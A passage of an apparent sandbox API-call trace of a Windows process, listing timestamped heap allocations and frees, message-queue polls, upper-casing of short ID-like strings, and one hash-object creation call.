lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.460] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.461] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.461] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0164.461] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.461] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0164.461] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.461] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.461] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.461] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.462] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.462] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.462] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.462] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.462] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.462] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.462] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.462] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.462] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.463] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0164.463] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.463] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0164.463] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0164.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0164.463] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0164.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.464] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.464] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.464] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.465] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.465] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.465] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0164.465] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.465] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.465] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.465] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.465] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.466] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.466] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.466] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.466] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.466] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.466] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.466] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.467] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.467] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0164.467] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.467] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.467] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.468] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.468] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.468] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.468] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.468] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.468] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.468] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.468] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.469] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0164.469] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 